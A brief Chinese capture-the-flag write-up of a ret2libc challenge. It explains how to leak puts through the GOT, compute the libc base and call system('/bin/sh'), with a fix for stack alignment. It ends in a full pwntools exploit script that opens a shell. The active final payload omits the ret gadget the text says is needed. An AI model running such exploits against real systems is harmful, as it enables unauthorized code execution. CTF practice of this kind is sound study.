ret2libc
保护。
啥没有。
直接就溢出了,但是没后门函数,就通过puts函数泄露puts函数地址,计算libc基地址,找到system函数与’/bin/sh’, 然后一把梭就好。
需要用到gadget。
在调试过程中发现最后会出问题,然后gdb.attach贴上以后开始调。
这个地方其实已经看出来了,进入了system函数,rdi也是‘/bin/sh’,似乎没啥问题,但是下面就卡住了。
这个地方卡住是因为没有栈对齐,你可以看到此时rsp是78,但是他要求16位对齐,最后得是0,所以需要在system地址前面加上个ret。
具体的看下面的wp
exp
from pwn import*
context.log_level = "debug"
#r = remote('node3.buuoj.cn', 28222)
r = process('./rop')
elf = ELF('./rop')
libc = ELF('./libc-2.271.so')
gdb.attach(r)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x4005d3
main_addr = 0x400537
ret_addr = 0x400562
r.recvline()
payload = 'a' * 18 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)
#print(r.recvline())
puts_addr = u64(r.recv(6).ljust(8, '\x00'))
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))
print hex(puts_addr)
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
print hex(libc_base)
print hex(system_addr)
print hex(bin_sh)
info("libc:0x%x",libc_base)
payload = 'a' * 18 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
#payload = 'a' * 18 + p64(pop_rdi) + p64(bin_sh) + p64(ret_addr) + p64(system_addr)
r.sendline(payload)
r.interactive()